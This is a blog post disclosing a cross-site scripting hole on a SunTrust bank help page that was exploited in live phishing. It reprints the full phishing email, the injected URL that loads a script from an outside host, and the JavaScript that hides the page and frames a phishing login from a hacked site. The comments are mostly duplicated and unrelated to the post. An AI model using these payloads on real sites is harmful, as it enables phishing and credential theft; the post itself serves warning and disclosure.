OUCH! SunTrust’s Web site is PWN3d!

I know some of my regular readers have accounts with SunTrust bank. If you do, and you recently received an email telling you that your account records need to be updated, and you clicked on any link in that email, change your account password IMMEDIATELY. It is not necessary for you to have typed in your account username and password at the prompt; the attack can lift the SunTrust cookies from your browser.

You see, SunTrust left a security hole in their Web server; this security hole allows an attacker to use what’s called a “cross site scripting” attack to take control of the pages you see when you browse to SunTrust URLs.

I have confirmed this security hole exists, and have created a quick demo to show how it works. If you click on this link:

Clicky here
[EDIT:] Within 5 minutes of my making this post, LiveJournal’s servers flagged the link as a cross-site scripting link and disabled it. Nicely done! Kudos to the LJ team for making their software aware of hostile links. If you want to try out my demo of the vulnerability, copy into your browser:

http://helpcenter.suntrust.com/doc/sn6400.xml?SID=586&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://www.obsidianfields.com/suntrustxssdemo/xssdemo.js

you will be taken to the Web site helpcenter.suntrust.com, a legitimate SunTrust Web page.

[UPDATE]: As of Wednesday afternoon, SunTrust’s IT people have fixed the XSS hole.

But wait! What do you see? If the security hole still exists when you visit this URL, you’ll see a red Web page reading “The cross-site scripting vulnerability at helpcenter.suntrust.com IS STILL ACTIVE”. What’s going on?

What’s going on is that helpcenter.suntrust.com can be fooled just by manipulating the URL into loading content from anywhere on the Web, overwriting whatever is supposed to be there. No, I don’t have access to the SunTrust servers directly, and neither does the attacker. What I CAN do is create a Web page with anything I want, and then create a link that causes my Web page to load at helpcenter.suntrust.com in place of what is supposed to be there. And, if I wanted to, I could also read SunTrust cookies stored in your browser as well, presumably including login cookies if you have ticked the “remember me” checkbox on SunTrust’s login page.

In English, that means you can not trust anything you see displayed at helpcenter.suntrust.com, even if you are 100% positive that the URL of your browser is in fact helpcenter.suntrust.com. It is trivial to create malicious links that change the content displayed at helpcenter.suntrust.com, as I haveshown in my example. This security hole is currently being used in a “phishing” attack that shows you what looks like a perfectly legitimate login page at helpcenter.suntrust.com, but is in fact a page under the control of the hacker on a hacked Web server in Australia.

The attack is currently using a phony email with the title “Your account records have not been updated for too long”. This email looks like a bog-standard phishing attack of the kind we all see fifteen or twenty times a day. The full email looks like this:

Return-Path: <saojorge@linux.linuxcpanelhost.com>
Received: from mtain-md04.r1000.mx.aol.com (mtain-md04.r1000.mx.aol.com [172.29.96.88]) by air-de06.mail.aol.com (v129.4) with ESMTP id MAILINDE061-5eb64bf34aeb237; Tue, 18 May 2010 22:20:27 -0400
Received: from linux.linuxcpanelhost.com (linux.linuxcpanelhost.com [74.86.210.130])
by mtain-md04.r1000.mx.aol.com (Internet Inbound) with ESMTP id 521D03800009D
for <tacitr@aol.com>; Tue, 18 May 2010 22:20:27 -0400 (EDT)
Received: from saojorge by linux.linuxcpanelhost.com with local (Exim 4.69)
(envelope-from <saojorge@linux.linuxcpanelhost.com>)
id 1OEVAI-0005bM-Di
for tacitr@aol.com; Tue, 18 May 2010 19:21:06 -0300
To: tacitr@aol.com
Subject: Your account records have not been updated for too long
MIME-Version: 1.0
Content-type: text/html; charset=UTF-8
From: SunTrust <support@en.suntrust.com>
Message-Id: <E1OEVAI-0005bM-Di@linux.linuxcpanelhost.com>
Date: Tue, 18 May 2010 19:21:06 -0300
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname – linux.linuxcpanelhost.com
X-AntiAbuse: Original Domain – aol.com
X-AntiAbuse: Originator/Caller UID/GID – [1063 32007] / [47 12]
X-AntiAbuse: Sender Address Domain – linux.linuxcpanelhost.com
X-Source:
X-Source-Args:
X-Source-Dir:
x-aol-global-disposition: S
x-aol-sid: 3039ac1d60584bf34aeb424c
X-AOL-IP: 74.86.210.130
X-Mailer: Unknown (No Version)

<div style=”padding:15px;font-family:arial;font-size:12px”><p style=”margin:0 0 15px 0″><b>Hello tacitr,</b></p>
<p style=”margin:0 0 20px 0″><span style=”font-size:14px;color:red”><b>Your account records haven’t been updated for too long</b></span><br><br>
Please note that some of your personal information might be outdated.<br>To reactivate your account, please visit our Help Center:</p>
<p style=”margin:0 0 20px 0″><a href=”http://helpcenter.suntrust.com/doc/sn6400.xml?SID=5869ef9427faf3a485d236a6ec2ccabdff1f394b903709f3da2a96d99989532b04a1158347e000bc4832bed19b3cc21863a836f0ac43a73de1f1f3b09408808f152c25c47ed28cb799ccb1b5ea2d6715d3411586f03338d3852223611642889d&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://124.217.229.185/~demadm/logs/help.js%22%3E%3C/script%3E%3Cparam%20class=%22&UID=75178461717441605271041666529446753430202992796716260595685782413851209232661″ target=”_blank”>
http://helpcenter.suntrust.com/doc/sn6400.xml?SID=5869ef9427faf3a485d236a…</a></p><p style=”margin:0 0 20px 0″>Best regards,<br>SunTrust Customer Service<br><br>
<span style=”color:gray”>SunTrust Bank,<br>P.O. Box 4418 GA-Atlanta-0795,<br>Atlanta, GA 30302-4418</span></p></div>


The interesting thing you will notice about this phish, which makes it very different from garden-variety phishing attacks, is that it actually contains a real SunTrust URL. The SunTrust Web page at

http://helpcenter.suntrust.com/doc/sn6400.xml

contains a type of security hole known as a “cross-site scripting flaw“. In simple terms, it means that the Web page is poorly created in such a way that I can trick it into loading and running a JavaScript from anywhere on the Web.

In this case, what happens is that the Web page at http://helpcenter.suntrust.com/doc/sn6400.xml is being used to load and run a JavaScript located at http://124.217.229.185/~demadm/logs/help.js. Look closely at the URL in the attack email. See all the junk after the question mark? Most of that junk is bogus, just there to throw off non-technical Web users.


The URL in the email can be divided into several parts:

http://helpcenter.suntrust.com/doc/sn6400.xmlSID=5869…(and so on)…&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://124.217.229.185/~demadm/logs/help.js%22%3E%3C/…(and so on)…

The stuff in blue is the SunTrust Web page. The stuff after that is made up of things that are given to the Web page so that it knows what to do. Normally, it would just be the first part in red, which I imagine would be a number corresponding to a text file to display.

Ah, but the part in green…

The Web designers at SunTrust did not check to see what was being passed to the Web page. The Web page will blindly accept and execute anything that it is passed. The part in green is the address of a malicious JavaScript. When it is passed to the Web page, the Web page executes the script, without regard to where it came from, and displays the result.

Here is the contents of the malicious script:

document.title = ‘SunTrust – Identification’;

document.write(‘<style>’);
document.write(‘html {‘);
document.write(‘height: 100%;’);
document.write(‘overflow: hidden;’);
document.write(‘}’);
document.write(‘body {‘);
document.write(‘overflow: hidden;’);
document.write(‘height: 100%;’);
document.write(‘margin: 0;’);
document.write(‘}’);
document.write(‘iframe {‘);
document.write(‘border: 0;’);
document.write(‘overflow: auto;’);
document.write(‘overflow-x: hidden;’);
document.write(‘margin: 0;’);
document.write(‘width: 100%;’);
document.write(‘height: 100%;’);
document.write(‘}’);
document.write(‘body table {‘);
document.write(‘display: none;’);
document.write(‘}’);
document.write(‘</style>’);

document.write(‘<iframe id=”mainframe” name=”mainframe” src=”http://designcats.com.au/forms/language/v/” frameborder=”0″ border=”0″></iframe>’);

window.onload = function() {
var frm = document.getElementById(‘mainframe’);
document.body.appendChild(frm);
}

If you don’t know JavaScript, basically what this script instructs the page to do is:

1. Change the title of the page to read “SunTrust: identification”;
2. Hide the content of the page;
3. Load new content from http://designcats.com.au/forms/language/v/ and show it.

The Web site at designcats.com.au is a hacked site that the hacker has placed a phish page on. So the email contains a real SunTrust Web site address, with instructions to load a script that will blank out the page and replace it with the phish page. The hacker’s phish page also attempts to load any SunTrust cookies, if it can.

You can see the results by clicking on the link I’ve placed above, which replaces the script at http://124.217.229.185/~demadm/logs/help.js with a script located on my server, which loads a red page reading “The cross-site scripting vulnerability at helpcenter.suntrust.com IS STILL ACTIVE.” If you click on my link, you’ll see the real SunTrust page load, then the screen will flicker as my script loads, then the page will turn red and show you the warning. If you just go to http://helpcenter.suntrust.com without any parameters, you’ll see the page you should see.

I’ve written to SunTrust to notify them that they have a security problem. Normally, I would not describe the problem or how it works until after they fix it. However, in this case, the security problem has already been discovered by the hacker underground and is being used in current, active attacks, so attempting to keep it secret at this point is pretty useless.

30 thoughts on “OUCH! SunTrust’s Web site is PWN3d!

  1. So I should *not* check my checking account online for the time being? This would make me very, very sad.

    Since I don’t understand all the tech stuff – I just want to be sure that what your saying is “don’t log into suntrust right now”

    • As long as you go directly to the main page of the SunTrust site, you’re OK. The hole existed (it’s beenfixed as of this afternoon) in their help center; any URL beginning with helpcenter.suntrust.com could potentially have been compromised.

  2. So I should *not* check my checking account online for the time being? This would make me very, very sad.

    Since I don’t understand all the tech stuff – I just want to be sure that what your saying is “don’t log into suntrust right now”

  3. I have received those phishing attempts via e-mail for Suntrust in the past and am a Suntrust customer, but I’m savvy enough to know a phishing e-mail when I see one. I don’t click the links. I just pull up the e-mail’s full source and send it to their fraud department.

  4. I have received those phishing attempts via e-mail for Suntrust in the past and am a Suntrust customer, but I’m savvy enough to know a phishing e-mail when I see one. I don’t click the links. I just pull up the e-mail’s full source and send it to their fraud department.

    • It isn’t quite the same issue, but it’s similar. In the one documented on Snopes, hackers rigged a phony popup in front of Suntrust’s window; in this one, they actually placed a phony login page inside the SunTrust window.

  5. As long as you go directly to the main page of the SunTrust site, you’re OK. The hole existed (it’s beenfixed as of this afternoon) in their help center; any URL beginning with helpcenter.suntrust.com could potentially have been compromised.

  6. It isn’t quite the same issue, but it’s similar. In the one documented on Snopes, hackers rigged a phony popup in front of Suntrust’s window; in this one, they actually placed a phony login page inside the SunTrust window.

  7. Have you ever seen the comedy routine where the guy (I can’t remember who it is) talks about how male conception of the birthing process in men who experience “Alien” as a child is permanently damaged?
    There’s also a really good bit about it in an episode of “Coupling.”

  8. Have you ever seen the comedy routine where the guy (I can’t remember who it is) talks about how male conception of the birthing process in men who experience “Alien” as a child is permanently damaged?
    There’s also a really good bit about it in an episode of “Coupling.”

  9. Hey! Do you know if they make any plugins to protect against hackers?
    I’m kinda paranoid about losing everything I’ve worked hard on.
    Any recommendations?

  10. Hey! Do you know if they make any plugins to protect against hackers?
    I’m kinda paranoid about losing everything I’ve worked hard on.
    Any recommendations?

  11. “What that means to me is I don’t have a roadmap of what “should” happen when I meet and connect with someone. I’m open to that connection taking a lot of different forms, and more important, I’m open to the form it takes changing, if that seems like what’s most natural.”

    THIS – my best friendships have come about from not trying to fit people into a pattern, especially the dysfunctional ones handed to us by pop culture. My eyes have been opened to the fact that underneath the labels we have for any kind of relationship (friends, friends-with-benefits, boyfriend, girlfriend) is whole kinds of human experiences that blur the lines of all of those and we have no words for.

  12. “What that means to me is I don’t have a roadmap of what “should” happen when I meet and connect with someone. I’m open to that connection taking a lot of different forms, and more important, I’m open to the form it takes changing, if that seems like what’s most natural.”

    THIS – my best friendships have come about from not trying to fit people into a pattern, especially the dysfunctional ones handed to us by pop culture. My eyes have been opened to the fact that underneath the labels we have for any kind of relationship (friends, friends-with-benefits, boyfriend, girlfriend) is whole kinds of human experiences that blur the lines of all of those and we have no words for.

  13. I have the very tough experience of not liking my husband’s girlfriend. That is the hardest I have ever tried to like someone despite my instinctive aversion. I can honestly say I did my very best.

    As it turned out, my dislike was grounded in reality, but that is not what I wished. I did not demand he break up with her. I did gently point out things she did that hurt him, and I did encourage him to protect himself. I don’t know that any of that helped really. The chemistry of love makes hearing anything negative very difficult. Eventually she broke his heart in a derisive and dismissive way. It still took him two years and therapy to get past all the anger and most of the hurt. (Bonus, his therapist & her family are now friends.)

    He told me I could veto anyone who triggered my *run!* radar like that. I told him no I could not. I will share what I see with him. But those choices are his, not mine. I have enough choices of my own to make!

    What I have learned: love is not enough. Love alone cannot bridge gaps in compatibility, failures in communication, or flaws in ethics. Love is wonderful stuff, but there is a LOT more to relationship success than that rush of hearts & flowers. We all have flaws and we all make mistakes. Those are fine. SEEING the flaws for what they are, and understanding what to do when mistakes are made – and being able to tell the difference between a mistake and a pathology symptom – are key.

  14. I have the very tough experience of not liking my husband’s girlfriend. That is the hardest I have ever tried to like someone despite my instinctive aversion. I can honestly say I did my very best.

    As it turned out, my dislike was grounded in reality, but that is not what I wished. I did not demand he break up with her. I did gently point out things she did that hurt him, and I did encourage him to protect himself. I don’t know that any of that helped really. The chemistry of love makes hearing anything negative very difficult. Eventually she broke his heart in a derisive and dismissive way. It still took him two years and therapy to get past all the anger and most of the hurt. (Bonus, his therapist & her family are now friends.)

    He told me I could veto anyone who triggered my *run!* radar like that. I told him no I could not. I will share what I see with him. But those choices are his, not mine. I have enough choices of my own to make!

    What I have learned: love is not enough. Love alone cannot bridge gaps in compatibility, failures in communication, or flaws in ethics. Love is wonderful stuff, but there is a LOT more to relationship success than that rush of hearts & flowers. We all have flaws and we all make mistakes. Those are fine. SEEING the flaws for what they are, and understanding what to do when mistakes are made – and being able to tell the difference between a mistake and a pathology symptom – are key.

  15. Ok so i am into this, i am a female.. my boy friend though…how to say this.. has said that he is a fan of bdsm life style, but we are at opposites here.. we’re both during people in the everyday world so in our fantasy land we both like to belittled which there less the problem and he can’t reach the amount of anger and ferocity I’m looking for. Any tips?

  16. Ok so i am into this, i am a female.. my boy friend though…how to say this.. has said that he is a fan of bdsm life style, but we are at opposites here.. we’re both during people in the everyday world so in our fantasy land we both like to belittled which there less the problem and he can’t reach the amount of anger and ferocity I’m looking for. Any tips?

  17. I think it might be a little unfair to simply sweep aside another group’s problem (such as men’s, in the case of your post here, tacit) with a broad brush like calling it diversionary. In any situation, it’s likely that one group or another has a privileged position. Being a white American male is not always the most privileged position, any more than being a black woman from Congo is always the least privileged position. If we’re going to have an honest conversation about the topic, we -all- have to look at the situations in which we experience a privileged position, and not allow ourselves to slip into comfortable rhetoric about domination or institutionalization.

  18. I think it might be a little unfair to simply sweep aside another group’s problem (such as men’s, in the case of your post here, tacit) with a broad brush like calling it diversionary. In any situation, it’s likely that one group or another has a privileged position. Being a white American male is not always the most privileged position, any more than being a black woman from Congo is always the least privileged position. If we’re going to have an honest conversation about the topic, we -all- have to look at the situations in which we experience a privileged position, and not allow ourselves to slip into comfortable rhetoric about domination or institutionalization.

  19. i’m not very familiar with the google apps UI… is it possible that they do state that somewhere / have a checkbox option and it’s just a bad design and people are missing it? regardless, it’s clearly an important usability issue if multiple companies are not even aware that it’s happening….

    a catchall for “abuse” probably isn’t something they’d support since people do have emails like abuse_me_sexy_dom or whatevs 😉

  20. i’m not very familiar with the google apps UI… is it possible that they do state that somewhere / have a checkbox option and it’s just a bad design and people are missing it? regardless, it’s clearly an important usability issue if multiple companies are not even aware that it’s happening….

    a catchall for “abuse” probably isn’t something they’d support since people do have emails like abuse_me_sexy_dom or whatevs 😉

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.